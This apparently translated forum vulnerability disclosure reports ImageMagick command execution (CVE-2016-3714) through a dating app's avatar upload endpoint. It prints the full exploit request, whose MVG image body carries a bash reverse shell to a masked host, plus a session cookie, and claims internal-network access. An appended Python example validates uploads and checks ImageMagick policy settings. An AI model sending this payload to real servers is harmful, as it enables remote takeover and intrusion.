HanDs
Administrator

[July vulnerability disclosure] Command execution on a Baihe site / easy access to the Baihe internal network



Details:

Target: Baihe Miyu iOS app

Testing found that the avatar upload endpoint is affected by CVE-2016-3714 (ImageMagick command execution).

Code:
POST http://miyu.apps.ibaihe.com/user/update HTTP/1.1
Host: miyu.apps.ibaihe.com
Content-Type: multipart/form-data; boundary=Boundary+21678AD4911AD07A
Cookie: SESSIONID=8A599FECF109036CF707D19BCF8F0A8A7E3809B8C2B84839E3C1AC204E3F0640EAAF21A8534AB4048BBDA6AF5A7D2456A41ACE153F7D435B7D1A9A01C1FDD016CECC60F99738981F657CA808FA71C17F6A8E20E1D5D2ED2CDFBAC1DE748EDF54
Connection: keep-alive
Connection: keep-alive
Accept: */*
User-Agent: BHMY/1.4.6 (iPhone; iOS 9.3.2; Scale/2.00)
Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9
Content-Length: 841
Accept-Encoding: gzip, deflate

--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="avatar"

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2222 0>&1")'
pop graphic-context
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="channel"

iOS||iOS_9.3.2||AppSotre||iPhone 6s||Apple
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="listener"

0
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="version"

1.4.6
--Boundary+21678AD4911AD07A
Content-Disposition: form-data; name="avatar"; filename="2016-06-03-20-49-04-0.jpg"
Content-Type: jpg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2222 0>&1")'
pop graphic-context
--Boundary+21678AD4911AD07A--

Proof of vulnerability:

Reverse shell

[image: id.jpg]

[image: hostname.jpg]

Pinging the main Baihe site shows we are already inside the internal network

[image: ping.jpg]

[image: ifconfig.jpg]

Fix:

Please advise~


#1
Posted: 2016-7-19   |   Views: 0   |   Replies: 0
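The post leaves the fix section open. As an added example (my own code, not part of the original post and not Baihe's code), the block below shows the two server-side controls a defender would want for this endpoint: refusing an upload whose bytes are an MVG/SVG script rather than a raster image before it is handed to ImageMagick, and checking that a server's ImageMagick policy.xml disables the coders the ImageTragick advisory names. The sample payload, the JPEG stub and the two policy snippets are constructed; the function names are my own.

```python
"""Added example (not from the original post): server-side checks for an avatar
upload handler against CVE-2016-3714 (ImageTragick).  Standard library only."""
import re
import xml.etree.ElementTree as ET

# Magic bytes of the raster formats an avatar endpoint has any reason to accept.
ALLOWED_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Text markers of ImageMagick's scriptable coders (MVG/SVG).  ImageMagick selects
# the MVG coder from a leading "push graphic-context", so only the leading bytes
# are inspected; a genuine JPEG/PNG/GIF never begins with text like this.
SCRIPT_MARKERS = re.compile(rb"push\s+graphic-context|<svg\b|url\(", re.IGNORECASE)

# Coders the ImageTragick advisory recommends disabling in policy.xml.
REQUIRED_DISABLED_CODERS = {
    "EPHEMERAL", "URL", "HTTPS", "MVG", "MSL", "TEXT", "SHOW", "WIN", "PLT",
}


def sniff_image_type(data: bytes):
    """Return the raster format implied by the magic bytes, or None."""
    for magic, fmt in ALLOWED_MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None


def validate_avatar(data: bytes) -> tuple:
    """Decide whether an uploaded avatar may be passed to ImageMagick.

    Returns (accepted, reason).  Only the bytes are trusted, never the client's
    Content-Type or filename: the request above declares "Content-Type: jpg" and
    a .jpg filename while the body is a plain-text MVG script.
    """
    head = data[:512].lstrip()
    if SCRIPT_MARKERS.search(head):
        return False, "body looks like an MVG/SVG script, not a raster image"
    fmt = sniff_image_type(data)
    if fmt is None:
        return False, "magic bytes do not match jpeg/png/gif"
    return True, fmt


def missing_policy_coders(policy_xml: str) -> set:
    """Return the advisory's coders that a policy.xml does NOT disable.

    An empty set means every recommended
    <policy domain="coder" rights="none" pattern="..."/> entry is present.
    """
    root = ET.fromstring(policy_xml)
    disabled = set()
    for policy in root.iter("policy"):
        if policy.get("domain") == "coder" and policy.get("rights") == "none":
            disabled.add(policy.get("pattern", "").upper())
    return REQUIRED_DISABLED_CODERS - disabled


# Constructed sample inputs (not captured from any real system).
MVG_PAYLOAD = (b"push graphic-context\nviewbox 0 0 640 480\n"
               b"fill 'url(https://example.com/image.jpg)'\npop graphic-context\n")
TINY_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 32 + b"\xff\xd9"
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>"""
PARTIAL_POLICY = ('<policymap>'
                  '<policy domain="coder" rights="none" pattern="MVG" />'
                  '</policymap>')

if __name__ == "__main__":
    print(validate_avatar(MVG_PAYLOAD))            # (False, 'body looks like an MVG/SVG script, not a raster image')
    print(validate_avatar(TINY_JPEG))              # (True, 'jpeg')
    print(missing_policy_coders(HARDENED_POLICY))  # set()
    print(missing_policy_coders(PARTIAL_POLICY))   # the 8 coders other than MVG
```

The marker scan is defence in depth; the magic-byte check alone already keeps ImageMagick from choosing the MVG coder, and upgrading ImageMagick past the affected versions remains the primary fix.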